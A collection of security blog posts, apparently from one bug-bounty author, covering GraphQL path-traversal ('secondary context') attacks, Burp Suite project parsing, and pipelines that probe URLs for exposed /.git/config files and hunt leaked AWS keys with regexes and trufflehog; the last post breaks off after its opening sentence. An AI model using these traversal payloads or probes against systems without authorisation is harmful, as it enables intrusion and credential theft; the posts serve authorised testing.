[{"content":"Misconfigured GraphQL implementations can allow for attackers to bypass authorization and access internal APIs. These \u0026ldquo;secondary context attacks\u0026rdquo; exploit the gap between GraphQL\u0026rsquo;s frontend interface and backend REST services, often turning simple path traversal into significant data access.\nThe Backend for Frontend Pattern In the Backend for Frontend (BFF) pattern, a middleware layer combines multiple backend services into customized REST endpoints for each frontend, eliminating the need for clients to make separate calls to individual microservices. For example, the infrastructure layout could look like:\nBreaking this down into a REST API request:\nOn the backend of the BFF, the microservice request would be translated to:\nAnd the response:\nIn short:\nYears ago Sam Curry (https://samcurry.net/hacking-starbucks) introduced the idea of a \u0026ldquo;secondary context\u0026rdquo; attack. Specifically, a directory traversal payload (\u0026quot;../\u0026quot;) is placed into an API request. When the payload is passed to the microservice URL, the directory traversal reroutes the request to another service or other user\u0026rsquo;s data. Using our example similar to above:\nA secondary context attack often works because authorization is relaxed or removed from the front-end to the back-end. Developers can introduce this to reduce complexity in microservice calls (e.g. authorization requirements between services):\nThe problem: Misplaced trust in GraphQL scalars GraphQL schemas are strongly typed including 5 built-in scalars (int, float, string,boolean,id). It is a common mistake to believe the ID type is a UUID.** ID is the equivalent of a string and not a UUID.**\nšŸ˜± The official GraphQL specification statesID: A unique identifier, often used to refetch an object or as the key for a cache. The ID type is serialized in the same way as a String; however, defining it as an ID signifies that it is not intended to be humanā€readable.- Basic Types | GraphQL\nThe ID scalar type accepts any string value and performs no format validation out of the box.\nThis create an injection point for path traversal attacks.\nIn the following screenshot, the GraphQL POST request designates contactid as an ID scalar. Replacing the original UUID with notrealid indicates (1) the contactid has no secondary validation as a UUID and (2) the route is clearly returned in the error message:\nIt was an easy jump to replace notrealid with ../test and validate the new route:\nThe impact from type of bug can be anywhere from IDOR to SQL Injection and massive business logic flaws. I gave a talk on this in 2024, GraphQL Exploitation: Secondary Context Attacks and Business Logic Vulnerabilities https://www.youtube.com/watch?v=1TdpDBZj7RA.\nBug Hunting Recommendations Look for GraphQL endpoints accepting ID or String parameters. Test with path traversal payloads (../, URL encoding variants). Monitor error messages for internal URLs. šŸ’” Use BurpSuite Bambadas to notify on GraphQL requests that include a ID input\nDeveloper Recommendations Use the GraphQL Scalars library which is a library of custom GraphQL scalar types for creating precise type-safe scalars. Notably, there is a UUID scalar preventing attacks like above. I love this quote from their team on the stated goals from GraphQL Scalars:\n\u0026ldquo;Communicate to users of your schema exactly what they can expect or to at least reduce ambiguity in cases where thatā€™s possible.\u0026rdquo;\nAn excellent risk reduction exercise.\n","date":"2025-07-10T00:00:00Z","image":"/images/2025/07/Gemini_Generated_Image_ncaaprncaaprncaa.jpeg","permalink":"/exploiting-graphql-secondary-context-attacks/","title":"Exploiting GraphQL Secondary Context Attacks"},{"content":"The @trickest Inventory project is an interesting resource. It has a massive set of hostnames, live services, spidered URLs, and cloud data organized by Bug Bounty program. There is so much more data than I have interest in storing for my needs. In fact, the only thing I am interested in is the hostnames resource. Here is a quick and dirty way to pull the hostnames.txt file from every program without cloning the entire project.\nšŸ’” There is a good chance I am going to embarrass myself with this post and there is a better way. But this is part of learning and I embrace it. Please let me know and I will post the faster way at the top.\nFirst, pull the current project git history without cloning it:\n1 2 3 4 git clone --no-checkout \\ --depth 1 \\ --single-branch --branch=main \\ https://github.com/trickest/inventory.git Above we are cloning the project without checking out any files; --no-checkout. We are also only pulling HEAD (--depth 1) and only focused on the main branch.\nNote, just the commit history from main takes up 336Mb šŸ˜²\nFinally, we are going to download every hostname.txt file. This is done by finding the listing the HEAD tree, grep\u0026rsquo;ing for the filename, urlencoding \u0026amp; , and then downloading the file.\n1 2 3 4 git ls-tree --full-name --name-only -r HEAD | \\ grep hostnames.txt | \\ sed -e \u0026#34;s/\u0026amp;/%26/\u0026#34; | \\ xargs -I {} sh -c \u0026#39;curl -o $(echo {} | cut -d\\/ -f1)_hostnames.txt https://raw.githubusercontent.com/trickest/inventory/main/{}\u0026#39; At this point you should have a directory full of the relevant files.\nšŸ’” If you are using this technique with another project take care that you trust the input (directories and filenames). You are piping them into a subshell.\nIf you don\u0026rsquo;t want to pipe into a subshell (yolo), you can use wget (remove the -o subshell) but you will be left with every file named hostnames.txt.X:\n1 2 3 4 git ls-tree --full-name --name-only -r HEAD | \\ grep hostnames.txt | \\ sed -e \u0026#34;s/\u0026amp;/%26/\u0026#34; | \\ xargs -I {} wget https://raw.githubusercontent.com/trickest/inventory/main/{} ","date":"2022-08-26T00:00:00Z","image":"/images/2022/11/robot4.png","permalink":"/pulling-data-from-trickest-inventory/","title":"Pulling Specific Files from the Trickest Inventory (or any Github project)"},{"content":"Edit: 1.1b fixes an auto shutdown issue in burpsuite, I would highly recommend this release over 1.1a. The rest of the post still applies.\nThis is a small release but a useful one.\nRelease 1.1b adds the ability to parse projects for portions of siteMap and proxyHistory. For example, the following will only respond with the proxyHistory request.headers and request.body. Note, the URL is always included:\n1 2 java -jar -Djava.awt.headless=true [PATH_TO burpsuite_pro.jar] --project-file=[PATH TO PROJECT FILE] \\ proxyHistory.request.headers, proxyHistory.request.body This should result in significant speed improvements as parsing will ignore response.body which can be very large. Conversely, if you only wanted to parse the proxyHistory response body for interesting things you could do:\n1 2 java -jar -Djava.awt.headless=true [PATH_TO burpsuite_pro.jar] --project-file=[PATH TO PROJECT FILE] \\ proxyHistory.response.body ","date":"2022-07-21T00:00:00Z","image":"/images/2022/11/beer1.png","permalink":"/burpsuite-project-parser-v1-1/","title":"šŸŽ‰ burpsuite-project-file-parser v1.1 šŸŽ‰"},{"content":"In this two part series we are going to take Burp Suite Project files as input from the command line, parse them, and then feed them into a testing pipeline.\nThe series is broken down into two parts:\nGetting at the Data (i.e. from the CLI to feeding the pipeline) 8 Bug Hunting Examples with burpsuite-project-parser (i.e. from the pipeline to testing) This post is focused on bug hunting examples. Check out the previous post if you haven\u0026rsquo;t already setup the environment.\nCommand Shortcut In the previous post we used a long (repetitive) command to print the auditItems from a Burp Suite project file:\n1 2 3 4 5 6 7 8 java -jar -Djava.awt.headless=true \\ -Xmx2G \\ --add-opens=java.desktop/javax.swing=ALL-UNNAMED \\ --add-opens=java.base/java.lang=ALL-UNNAMED \\ ~/Downloads/burpsuite_pro_v2022.3.6.jar \\ --user-config-file=ONLY_BURP_PROJECT_PARSER.json \\ --project-file=2022-06-08.burp \\ auditItems For the sake of brevity, in this post we will replace the long command with a shorter one (e.g. $PARSE_BURP). You will need to make this specific to your environment:\n1 export PARSE_BURP=\u0026#34;java -jar -Djava.awt.headless=true -Xmx2G --add-opens=java.desktop/javax.swing=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED [INSERT_FULL_PATH]/burpsuite_pro_v2022.3.6.jar --user-config-file=[INSERT_FULL_PATH]/ONLY_BURP_PROJECT_PARSER.json --project-file=[INSERT_FULL_PATH]/[PROJECT_FILE].burp\u0026#34; Then we can print all of the auditItems with:\n1 $PARSE_BURP auditItems 8 Bug Hunting Examples with burpsuite-project-parser ā›… This list does not try to be comprehensive. Smarter people than me have done much better work mind mapping bug hunting techniques. In fact, if anything these are incomplete. They are meant as starting points in taking input from a Burp Suite Project file to \u0026ldquo;looking for a bug or testing for a state\u0026rdquo; (i.e. pipeline). If your feeling is \u0026ldquo;I could do this better\u0026rdquo; you are probably right ha. Take what works for you and leave the rest šŸ˜Š.\n1. Base Case In the base case burpsuite-project-parser proxyHistory will print the entire request (i.e. URL, headers, etc.) and response (headers, body, etc.) as JSON. For example: 1 2 3 4 5 6 7 $PARSE_BURP proxyHistory 2\u0026gt;/dev/null | grep -F \u0026#34;{\u0026#34; | head -n 2 ... ... {\u0026#34;Message\u0026#34;:\u0026#34;Loaded project file parser; updated for burp 2022.\u0026#34;} {\u0026#34;request\u0026#34;:{\u0026#34;url\u0026#34;:\u0026#34;http://detectportal.firefox.com:80/success.txt\u0026#34;,\u0026#34;headers\u0026#34;:[\u0026#34;Host: detectportal.firefox.com\u0026#34;,\u0026#34;User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0\u0026#34;,\u0026#34;Accept: */*\u0026#34;,\u0026#34;Accept-Language: en-US,en;q\\u003d0.5\u0026#34;,\u0026#34;Accept-Encoding: gzip, deflate\u0026#34;,\u0026#34;Cache-Control: no-cache\u0026#34;,\u0026#34;Pragma: no-cache\u0026#34;,\u0026#34;Connection: close\u0026#34;],\u0026#34;uri\u0026#34;:\u0026#34;/success.txt\u0026#34;,\u0026#34;method\u0026#34;:\u0026#34;GET\u0026#34;,\u0026#34;httpVersion\u0026#34;:\u0026#34;HTTP/1.1\u0026#34;,\u0026#34;body\u0026#34;:\u0026#34;\u0026#34;},\u0026#34;response\u0026#34;:{\u0026#34;url\u0026#34;:\u0026#34;http://detectportal.firefox.com:80/success.txt\u0026#34;,\u0026#34;headers\u0026#34;:[\u0026#34;Content-Type: text/plain\u0026#34;,\u0026#34;Content-Length: 8\u0026#34;,\u0026#34;Last-Modified: Mon, 15 May 2017 18:04:40 GMT\u0026#34;,\u0026#34;ETag: \\\u0026#34;ae780585fe1444eb7d28906123\\\u0026#34;\u0026#34;,\u0026#34;Accept-Ranges: bytes\u0026#34;,\u0026#34;Server: AmazonS3\u0026#34;,\u0026#34;X-Amz-Cf-Pop: ORD53-\u0026#34;,\u0026#34;X-Amz-Cf-Id: ADZK\u0026#34;,\u0026#34;Cache-Control: no-cache, no-store, must-revalidate\u0026#34;,\u0026#34;Date: Mon, 14 Sep 2020 17:59:54 GMT\u0026#34;,\u0026#34;Connection: close\u0026#34;],\u0026#34;code\u0026#34;:\u0026#34;200\u0026#34;,\u0026#34;body\u0026#34;:\u0026#34;success\\n\u0026#34;}} You will notice later on that we pipe this result to jq to get more specific with our query. For example, \u0026ldquo;give me only the URL from the JSON request\u0026rdquo; : | jq -c '{\u0026quot;url\u0026quot;:.request.url}'). Although we could grep all of the requests and responses, the chances are we can be more surgical than that.\nāš ļø I created an issue in burpsuite-project-parser to filter components from the proxyHistory and siteMap without jq. This should make the tool faster as well. You can follow the issue here and I will update the blog when this is done. āš ļø\n2. Search for bug class specific GET Parameters Like many people I have bug class specific GET parameters I search for (e.g. url= for SSRF). Let\u0026rsquo;s say we wanted to search a Burp Suite project for any request with url= as a GET parameter:\n1 2 3 4 $PARSE_BURP proxyHistory 2\u0026gt;/dev/null \\ | grep -F \u0026#34;{\u0026#34; | jq -c \u0026#39;{\u0026#34;url\u0026#34;:.request.url}\u0026#39; \\ | cut -d\\\u0026#34; -f4 | tr -d \\\u0026#34; \\ | grep -ie \u0026#34;\\?url=\u0026#34; -ie \u0026#34;\\\u0026amp;url=\u0026#34; Example Results:\n1 2 3 https://target1:443/pagead/1p-user-list/1057924016/?url=example https://target1:443/cc.js?engine_key=123Q2K\u0026amp;url=somesite ... Let\u0026rsquo;s break this first example down a bit.\n$PARSE_BURP proxyHistory 2\u0026gt;/dev/null\u0026ndash;\u0026gt; Parse our project file and output all of the request/response Proxy History as JSON | grep -F \u0026quot;{\u0026quot; | jq -c '{\u0026quot;url\u0026quot;:.request.url}'\u0026ndash;\u0026gt; Take the JSON input and grab** only the request URLs** | cut -d\u0026quot; -f4 | tr -d \\\u0026quot;\u0026ndash;\u0026gt; Give me the URL only and trim the quotes grep -ie \u0026quot;?url=\u0026quot; -ie \u0026quot;\u0026amp;url=\u0026quot;\u0026ndash;\u0026gt; Grep for either (-e) \u0026ldquo;?url=\u0026rdquo; or \u0026ldquo;\u0026amp;url\u0026rdquo; in a case insensitive manner This should give us a nice list of URLs that contained =url in their GET request.\nšŸ’” You can replace the above grep command with any bug class you find interesting. Resources like SecLists are a good start with example dictionaries. There are a lot more out there as well and I think most people curate their own.\n3. Create a script to request a page with input from proxy history Let\u0026rsquo;s say we wanted to take in every URL from our project and perform a scan looking for a specific file (e.g. /.git/config) on that URL. Here is one way to create a script for this using the previous Burp History as input in our pipeline.\n1 2 3 4 5 6 $PARSE_BURP proxyHistory 2\u0026gt;/dev/null \\ | grep -F \u0026#34;{\u0026#34; | jq -c \u0026#39;{\u0026#34;url\u0026#34;:.request.url}\u0026#39; \\ | cut -d\\\u0026#34; -f4 | tr -d \\\u0026#34; \\ | cut -d\\? -f1 \\ | xargs -I {} printf \u0026#34;curl {}/.git/config\\n\u0026#34; | tee git_script.sh You should end up with set of commands in a shell script like:\n1 2 3 4 curl https://target1.com/images/font-awesome-4.2.0/fonts/fontawesome-webfont.woff/.git/config curl https://target1.com/images/avatar.png/.git/config curl https://target1.com/some/dir/.git/config ... Right away you can probably see one of the (many) problems with this. Our \u0026ldquo;pipeline\u0026rdquo; is appending to the full URL and not cutting off at the directory. In some cases this might be intended behavior, but chances are it is not.\nšŸ’” I will leave it as an exercise to the reader to fix this (hint: rev + cut complement is one way. The solution is also in the next section).What other problems could there be with doing it this way? Are these the best settings for curl? Is curl the best tool for this job?\n4. Feeding the ffuf monster ffuf is incredible. Read/watch this brilliant šŸ’Ž by @codingo for an overview of ffuf: https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html.\nThe previous idea of searching for a specific file is better suited for a tool like ffuf. So let\u0026rsquo;s go back to the same page search but with ffuf instead. First, make sure to create a \u0026ldquo;bruteforce dictionary\u0026rdquo; with the just /.git/config in it. Then:\n1 2 3 4 5 6 7 $PARSE_BURP proxyHistory 2\u0026gt;/dev/null \\ | grep -F \u0026#34;{\u0026#34; | jq -c \u0026#39;{\u0026#34;url\u0026#34;:.request.url}\u0026#39; \\ | cut -d\\\u0026#34; -f4 | tr -d \\\u0026#34; \\ | rev | cut -d\\/ -f2- | rev \\ | sort -u --parallel=2G \\ | xargs -I {} printf \u0026#34;ffuf -t 40 -r -u \\\u0026#34;{}/FUZZ\\\u0026#34; -maxtime 60 -v -c -w /tmp/gitc \\n\u0026#34; \\ | tee ffuf_search.sh Example results:\n1 2 3 4 ffuf -t 40 -r -u \u0026#34;http://target1/ajax/libs/jquery/1.11.0/FUZZ\u0026#34; -maxtime 60 -v -c -w /tmp/gitc ffuf -t 40 -r -u \u0026#34;http://target2/FUZZ\u0026#34; -maxtime 60 -v -c -w /tmp/gitc ffuf -t 40 -r -u \u0026#34;http://target2/images/FUZZ\u0026#34; -maxtime 60 -v -c -w /tmp/gitc ... | rev | cut -d\\/ -f2- | rev \\\u0026ndash;\u0026gt; This is the solution to the previous question; grab the URL up to the directory | sort -u --parallel=2G\u0026ndash;\u0026gt; Sort and give only the unique URLs. xargs -I {} printf \u0026quot;ffuf -t 40 -r -u \u0026quot;{}/FUZZ\u0026quot; -maxtime 60 -v -c -w /tmp/gitc \\n\u0026quot;\u0026ndash;\u0026gt; The ffuf command šŸ’” What are my assumptions and potential issues with this new technique? How is this inefficient? Is every URL in-scope to your testing? Is the ffuf command correct?\n5. Find HTTP Response Headers with nginx In this example we want to look through a Burp Suite project for any server response header that contains nginx (i.e. Server: Nginx 1.12 ). This can be done with:\n1 2 $PARSE_BURP responseHeader=\u0026#39;.*(Servlet|nginx).*\u0026#39; 2\u0026gt;/dev/null \\ | sort -u --parallel=2G Example Results:\n1 2 3 {\u0026#34;url\u0026#34;:\u0026#34;https://target1:443/webfonts/fa-solid-900.woff2\u0026#34;,\u0026#34;header\u0026#34;:\u0026#34;Server: nginx/1.12.2\u0026#34;} {\u0026#34;url\u0026#34;:\u0026#34;https://target2:443/\u0026#34;,\u0026#34;header\u0026#34;:\u0026#34;Server: nginx/1.14.0 + Phusion Passenger 6.0.6\u0026#34;} ... 6. Search for an API key with regex - Take 1 In this example we want to search through a Burp Suite Project for a known API key regex. For example, ([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,} (Source: https://github.com/dxa4481/truffleHogRegexes/issues/19) will identify AWS API keys. Here is how we would do that against our project file:\n1 $PARSE_BURP responseHeader=\u0026#39;.*([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}.*\u0026#39; 2\u0026gt;/dev/null 7. Search for all the API key(s) with regex - Take 2 There are a couple of issues with Take 1 above. First, it has low yield because we are only using a single regex when we could be greedier about it. Second, it\u0026rsquo;s memory intensive and doesn\u0026rsquo;t scale well.\nOne solution is to use \u0026ldquo;the save results to MongoDB\u0026rdquo; feature (i.e. storeData=[MongoDB Host]) and then write a script to search the results. This scales very well and is reusable.\nAnother solution which is a little messier (and greedier) is to write all of the responses to files and then use an awesome tool like trufflehog (https://github.com/trufflesecurity/trufflehog) to find all the secrets. That sounds like more fun, let\u0026rsquo;s go with that.\nStep 1 is to write all of the HTTP responses from a Burp Suite project file to a directory.\n1 2 3 4 mkdir burp_responses $PARSE_BURP proxyHistory 2\u0026gt;/dev/null \\ | grep -F \u0026#34;{\u0026#34; | jq -c \u0026#39;{\u0026#34;url\u0026#34;:.request.url,\u0026#34;body\u0026#34;:.response.body}\u0026#39; \\ | while read line; do echo $line | tee burp_responses/$(uuidgen | tr -d \u0026#39;-\u0026#39;).burp; done šŸ’” Note, this will print the URL and the response body (only) to a set of files with one request/response per file. If you want to search HTTP request headers, HTTP response headers etc. then you need to adjust or remove the jq filter on line 2.On my system this command took around 10 minutes to run. A 384Mb project file became 313Mb worth of 105,309 files.āš ļø This is the first time I have broken ls on my system with a too many files error in a directory šŸ˜‚ āš ļø\nAt this point we should have a directory (i.e. burp_responses) filled with thousands of files containing the URL and the response one per file. Lastly run trufflehog over the set of files and look for results.\n1 trufflehog filesystem --directory=burp_responses --no-verification | tee trufflehog_results.txt šŸ’” For speed and privacy reasons, I chose to set the \u0026ndash;no-verification flag on my first pass. On secondary passes I would likely remove this flag.\n8. Search for all the API key(s) with regex - Take 3 Because we already have the HTTP response bodies in files let\u0026rsquo;s use gf by the legend @tomnomnom to search for interesting things. If you are unfamiliar with gf, the core idea is it\u0026rsquo;s a reusable wrapper around grep.\ngf comes pre-packaged with a set of great checks; https://github.com/tomnomnom/gf/blob/master/examples/.\nLet\u0026rsquo;s run the s3-buckets common gf patterns over our HTTP responses and see if we find anything of interest:\n1 2 3 4 cd burp_responses gf s3-buckets \\ | sort -u --parallel=2G \\ | tee -a gf_results.txt Although it\u0026rsquo;s not as powerful as using trufflehog, it is far superior to take 1. Furthermore, gf makes it easy to write and reuse your own grep checks. Consider this option when reviewing for interesting things at scale.\nConcluding Thoughts We have just skimmed the surface of the automation capabilities. I have lot more ideas (and experience) related to AppSec automation, so stay tuned!\n","date":"2022-06-17T00:00:00Z","image":"/images/2022/11/beer3.png","permalink":"/pushing-burp-suite-data-into-your-testing-pipeline-part-2/","title":"Building on an AppSec Pipeline with Burp Suite data - Part 2"},{"content":"In this two part series we are going to take Burp Suite Project files as input from the command line, parse them, and then feed them into a testing pipeline. The series is broken down into two parts:\nGetting at the Data (i.e. from the CLI to feeding the pipeline) 8 Bug Hunting Examples with burpsuite-project-parser (i.e. from the pipeline to testing) Introduction Two years ago I pushed to Github a Burp Suite plugin with a mouthful of a name: burpsuite-project-parser. It started out to solve a very simple problem.\nI am on day 10 of a web application assessment, I intercept a request, and I ask myself ā€œWhere the $@#* have I seen that parameter before?!?!ā€\nWhen I am on a long assessment or bug hunting over a period of time I keep multiple sequential Burp project files (e.g. 06-01-2022.burp, 06-08-2022.burp, etc). Typically I would need to open and close Burp Suite for each project file using the search UI to hunt for this single parameter or URI. This led to the idea:\nšŸ’” What if you could output as JSON all of the requests, responses, and findings from a Burp Suite project file using the CLI and then grep to search? Or save to a database? Or feed to another tool? \u0026hellip;.\nThis was the first problem solved by burpsuite-project-parser. From the CLI it will output every request/response (or findings) from a project file. For example:\n1 2 3 4 ... {\u0026#34;request\u0026#34;:{\u0026#34;url\u0026#34;:\u0026#34;http://secret.targethost.com:80/success.txt\u0026#34;,\u0026#34;headers\u0026#34;:[\u0026#34;Host: secret.targethost.com\u0026#34;,\u0026#34;User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0\u0026#34;,\u0026#34;Accept: */*\u0026#34;,\u0026#34;Accept-Language: en-US,en;q\\u003d0.5\u0026#34;,\u0026#34;Accept-Encoding: gzip, deflate\u0026#34;,\u0026#34;Cache-Control: no-cache\u0026#34;,\u0026#34;Pragma: no-cache\u0026#34;,\u0026#34;Connection: close\u0026#34;],\u0026#34;uri\u0026#34;:\u0026#34;/success.txt\u0026#34;,\u0026#34;method\u0026#34;:\u0026#34;GET\u0026#34;,\u0026#34;httpVersion\u0026#34;:\u0026#34;HTTP/1.1\u0026#34;,\u0026#34;body\u0026#34;:\u0026#34;\u0026#34;},\u0026#34;response\u0026#34;:{\u0026#34;url\u0026#34;:\u0026#34;http://secret.targethost.com:80/success.txt\u0026#34;,\u0026#34;headers\u0026#34;:[\u0026#34;Content-Type: text/plain\u0026#34;,\u0026#34;Content-Length: 8\u0026#34;,\u0026#34;Last-Modified: Mon, 15 May 2017 18:04:40 GMT\u0026#34;,\u0026#34;ETag: \\\u0026#34;ae780585fe1444eb7d28906123\\\u0026#34;\u0026#34;,\u0026#34;Accept-Ranges: bytes\u0026#34;,\u0026#34;Server: AmazonS3\u0026#34;,\u0026#34;X-Amz-Cf-Pop: ORD53-\u0026#34;,\u0026#34;X-Amz-Cf-Id: ADZK\u0026#34;,\u0026#34;Cache-Control: no-cache, no-store, must-revalidate\u0026#34;,\u0026#34;Date: Mon, 14 Sep 2020 17:59:54 GMT\u0026#34;,\u0026#34;Connection: close\u0026#34;],\u0026#34;code\u0026#34;:\u0026#34;200\u0026#34;,\u0026#34;body\u0026#34;:\u0026#34;success\\n\u0026#34;}} {\u0026#34;request\u0026#34;:{\u0026#34;url\u0026#34;:\u0026#34;https://mail.targethost.com:443/somepage\u0026#34;,\u0026#34;headers\u0026#34;:[\u0026#34;Host: x.tesla.com:443/somepage\u0026#34;,\u0026#34;User-Agent: ... ... The Github page for burpsuite-project-parser has the most up to date installation instructions so I won\u0026rsquo;t repeat those here. Instead I want to talk about how to parse larger amounts of Burp data in our pipeline.\nMoving Faster with Burp Suite User-Level Configuration Photo by Anton Filatov / Unsplash\nYou may or may not have played with Burp User-Level Configurations; they were certainly new to me when I started this project. The Burp Suite documentation does the best job of describing what\u0026rsquo;s included so I will just screenshot it here:\nBurpSuite Documentation Screenshot taken on 06/05/22\nThe most important point is that we can create a User-Level configuration to include just the burpsuite-project-parser Extender tool and not break our default Burp Suite configuration. This allows the loading and unloading of Burp Suite to be much faster as we are only applying one extension against the project file.\nThe following assumes you have already installed Burp Suite Project File Parser; if not, install it before going forward.\nFirst, **save your existing user options; **Burp \u0026gt; User Options \u0026gt; Save user options. Use a memorable name such as \u0026ldquo;DEFAULT_BURP_USER_OPTIONS.json\u0026rdquo;:\nMy default setup\nNext, disable all other Extensions except \u0026ldquo;BurpSuite Project File Parser\u0026rdquo; and \u0026ldquo;Save user options\u0026rdquo; as a new file (i.e. \u0026ldquo;ONLY_BURP_PROJECT_PARSER.json\u0026rdquo;):\nOnly the Project File Parser tool\nFinally, before closing Burp Suite, click \u0026ldquo;Load user options\u0026rdquo; and load your original custom options (i.e. \u0026ldquo;DEFAULT_BURP_USER_OPTIONS.json\u0026rdquo;) back in. This way, the next time you open Burp Suite GUI your configuration will be the same as what you are used to.\nTesting It\u0026rsquo;s time to test our setup. Run the following command against an existing project file to verify everything is working correctly. Make sure to replace 2022-06-08.burp with the name of your Burp Suite Project file and the location of your burpsuite jar file (e.g. ~/Downloads/burpsuite_pro_v2022.3.6.jar below):\n1 2 3 4 5 6 7 8 java -jar -Djava.awt.headless=true \\ -Xmx2G \\ --add-opens=java.desktop/javax.swing=ALL-UNNAMED \\ --add-opens=java.base/java.lang=ALL-UNNAMED \\ ~/Downloads/burpsuite_pro_v2022.3.6.jar \\ --user-config-file=ONLY_BURP_PROJECT_PARSER.json \\ --project-file=2022-06-08.burp \\ auditItems You should see audit items in the result:\n1 2 3 4 5 6 Warning: the fonts \u0026#34;Times\u0026#34; and \u0026#34;Times\u0026#34; are not available for the Java logical font \u0026#34;Serif\u0026#34;, which may have unexpected appearance or behavior. Re-enable the \u0026#34;Times\u0026#34; font to remove this warning. {\u0026#34;Message\u0026#34;:\u0026#34;Loaded project file parser; updated for burp 2022.\u0026#34;} [auditItems] {\u0026#34;issueName\u0026#34;:\u0026#34;Unencrypted communications\u0026#34;,\u0026#34;url\u0026#34;:\u0026#34;http://site1:80/\u0026#34;,\u0026#34;confidence\u0026#34;:\u0026#34;Certain\u0026#34;,\u0026#34;severity\u0026#34;:\u0026#34;Low\u0026#34;} {\u0026#34;issueName\u0026#34;:\u0026#34;Unencrypted communications\u0026#34;,\u0026#34;url\u0026#34;:\u0026#34;http://site2:80/\u0026#34;,\u0026#34;confidence\u0026#34;:\u0026#34;Certain\u0026#34;,\u0026#34;severity\u0026#34;:\u0026#34;Low\u0026#34;} ... šŸ’” Using my laptop as a benchmark it took around half the time to process a project file using the single purpose user option configuration compared to default. This speed up is even more drastic when we begin to process more files, larger projects, and include more complex options.\nMaybe not light speed but it\u0026rsquo;s waayyy faster.\nburpsuite-project-parser Flags At this point we now have a speedier way to parse project files. Before giving a few examples let\u0026rsquo;s reiterate what flags are available as of burpsuite-project-parser 1.0. Remember any output will be in JSON:\nauditItems: Outputs the audit findings from a project file. siteMap: Outputs all requests/responses from the site map. proxyHistory: Outputs all requests/responses from the site map. responseHeader=[regex]: Using the [regex] output any response that matches in the response headers. responseBody=[regex]: Using the [regex] output any response that matches in the response body. storeData=[MongoDB Host]: Store all requests/responses to a MongoDB server; check out the Github project for the required MongoDB settings.\nFeeding Data into the Pipeline Before we finish up let\u0026rsquo;s do a few examples.\nHere is a bash one-liner to output all of the findings from all of the project files in the current directory:\nLinux:\n1 2 3 4 5 6 7 8 9 find . -maxdepth 1 -name \u0026#34;*.burp\u0026#34; | xargs -i{} \\ java -jar -Djava.awt.headless=true \\ -Xmx2G \\ --add-opens=java.desktop/javax.swing=ALL-UNNAMED \\ --add-opens=java.base/java.lang=ALL-UNNAMED \\ ~/Downloads/burpsuite_pro_v2022.3.6.jar \\ --user-config-file=ONLY_BURP_PROJECT_PARSER.json \\ --project-file={} \\ auditItems 2\u0026gt;/dev/null OS X:\n1 2 3 4 5 6 7 8 9 find . -maxdepth 1 -name \u0026#34;*.burp\u0026#34; | xargs -I{} \\ java -jar -Djava.awt.headless=true \\ -Xmx2G \\ --add-opens=java.desktop/javax.swing=ALL-UNNAMED \\ --add-opens=java.base/java.lang=ALL-UNNAMED \\ ~/Downloads/burpsuite_pro_v2022.3.6.jar \\ --user-config-file=ONLY_BURP_PROJECT_PARSER.json \\ --project-file={} \\ auditItems 2\u0026gt;/dev/null Search every project file for Servlet or nginx in response header:\n1 2 3 4 5 6 7 8 9 find . -maxdepth 1 -name \u0026#34;*.burp\u0026#34; | xargs -I{} \\ java -jar -Djava.awt.headless=true \\ -Xmx2G \\ --add-opens=java.desktop/javax.swing=ALL-UNNAMED \\ --add-opens=java.base/java.lang=ALL-UNNAMED \\ ~/Downloads/burpsuite_pro_v2022.3.6.jar \\ --user-config-file=ONLY_BURP_PROJECT_PARSER.json \\ --project-file={} \\ responseHeader=\u0026#39;.*(Servlet|nginx).*\u0026#39; 2\u0026gt;/dev/null Grep all proxyHistory of all project files for \u0026ldquo;graphql\u0026rdquo; anywhere and output the URL where it was seen:\n1 2 3 4 5 6 7 8 9 10 11 find . -maxdepth 1 -name \u0026#34;*.burp\u0026#34; | xargs -I{} \\ java -jar -Djava.awt.headless=true \\ -Xmx2G \\ --add-opens=java.desktop/javax.swing=ALL-UNNAMED \\ --add-opens=java.base/java.lang=ALL-UNNAMED \\ ~/Downloads/burpsuite_pro_v2022.3.6.jar \\ --user-config-file=ONLY_BURP_PROJECT_PARSER.json \\ --project-file={} \\ proxyHistory 2\u0026gt;/dev/null \\ | grep -Fi \u0026#34;graphql\u0026#34; \\ | jq -c \u0026#39;{\u0026#34;url\u0026#34;:.request.url}\u0026#39; | cut -d\\\u0026#34; -f4 Grep for \u0026ldquo;url=\u0026rdquo; from proxyHistory in the url and uri only:\n1 2 3 4 5 6 7 8 9 10 11 12 13 find . -maxdepth 1 -name \u0026#34;*.burp\u0026#34; | xargs -I{} \\ java -jar -Djava.awt.headless=true \\ -Xmx2G \\ --add-opens=java.desktop/javax.swing=ALL-UNNAMED \\ --add-opens=java.base/java.lang=ALL-UNNAMED \\ ~/Downloads/burpsuite_pro_v2022.3.6.jar \\ --user-config-file=ONLY_BURP_PROJECT_PARSER.json \\ --project-file={} \\ proxyHistory 2\u0026gt;/dev/null \\ | grep -F \u0026#34;{\u0026#34; \\ | jq -c \u0026#39;{\u0026#34;url\u0026#34;:.request.url,\u0026#34;uri\u0026#34;:.request.uri}\u0026#39; \\ | cut -d\\\u0026#34; -f4,8 | tr -d \\\u0026#34; \\ | grep -iF \u0026#34;url=\u0026#34; YMMV Please keep in mind this plug-in follows a design philosophy of \u0026ldquo;one tool for the job\u0026rdquo;. Grepping through the proxyHistory and only outputting a URL may not be the most accurate way to get the data you are looking for. Instead, maybe putting everything into MongoDB (ElasticSearch, etc) or a custom JSON search script works better. In this next post we will take this idea further.\nPlease submit bugs and improvements to the Github project if you want!\n","date":"2022-06-08T00:00:00Z","image":"/images/2022/11/beer4.png","permalink":"/building-an-appsec-pipeline-with-burpsuite-data/","title":"Building on an AppSec Pipeline with Burp Suite data - Part 1"},{"content":"SSRF protocol smuggling involves an attacker injecting one TCP protocol into a dissimilar TCP protocol. A classic example is using gopher (i.e. the first protocol) to smuggle SMTP (i.e. the second protocol):\n1 